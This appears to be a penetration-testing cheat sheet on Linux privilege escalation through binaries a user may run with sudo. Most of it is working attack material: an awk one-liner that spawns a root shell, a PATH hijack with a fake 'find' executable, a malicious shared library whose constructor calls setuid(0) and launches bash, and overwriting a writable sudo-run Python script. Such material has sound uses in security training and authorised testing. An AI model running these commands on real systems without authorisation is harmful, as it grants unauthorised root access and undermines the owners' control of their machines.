Sudo Binaries

If the binary is allowed to run as sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

If you find that a binary can be run as sudo, you can check on GTFOBins for known exploits.

$ sudo -l

User demo may run the following commands on crashlab:
    (root): /usr/bin/awk

If you can run a binary with sudo rights, you may want to have look at GTFOBins, a curated list of Unix binaries that can be exploited to bypass local security restrictions. In this case with awk, we can spawn a shell with following commands:

sudo awk 'BEGIN {system("/bin/sh")}'

If a sudo binary/script executes another command without specifying the path. We can abuse it and get a privilege escalation.

You may use strings to spot other binaries calls, or do some reverse engineering on the sudo binary.

$ sudo -l
User demo may run the following commands on crashlab:
    (root): /opt/bin/the-sudo-bin

$ strings ./the-sudo-bin
...
find
...

We can create a malicious executable with the same name as the one called by the sudo binary.

echo '/bin/bash -p' > /tmp/find
chmod +x /tmp/find

Then, set the PATH env variable before executing the Sudo binary.

#Sudo with modified PATH
export PATH=/tmp:$PATH 
./the-sudo-bin

If you find some binary with Sudo permissions, you can check if all the .so files are loaded correctly.

strace the-sudo-bin 2>&1 | grep -i -E "open|access|no such file"

You also could check if the Sudo binary is loading a library from a folder where we can write:

# Lets find a Sudo using a non-standard library
ldd the-sudo-bin
something.so => /lib/x86_64-linux-gnu/something.so

# The Sudo also loads libraries from a custom location where we can write
readelf -d the-sudo-bin | grep PATH
0x000000000000001d (RUNPATH)            Library runpath: [/development]

Alternatively, you could use the strings command to find used shared library

strings ./the-sudo-bin | grep -i '*.so*'

For example, if you find that the Sudo binary doesn't load correctly /home/user/.config/libcalc.so or that you can overwrite it, you can exploit it.

Write a malicious shared library

//Saved to /home/user/.config/libcalc.c
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
        printf("Hello from the bad library");
        //setreSudo(0,0,0);
        setuid(0);
        setgid(0);
        system("/bin/bash -p");
}

Compile it

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c

Execute the Sudo binary

sudo the-sudo-bin

./Sudo_bin: symbol lookup error: ./Sudo_bin: undefined symbol: a_function_name

If you find some binary/script with Sudo permissions, you could check if you have enought rights to overwrite it. If so, you can replace it by a malicious one.

sudo -l
        (root) NOPASSWD: /usr/bin/python3 /home/<username>/example.py

Check permissions:

ls -la /home/<username>/
ls -la /home/<username>/example.py

If the python script is under a directory that you own, or if you have direct write access on it. We can remove the script and create a new one with the same name.

rm -rf /home/<username>/example.py
touch /home/<username>/example.py

We can insert arbitrary code in the new script. For example,

import os;os.system('/bin/bash')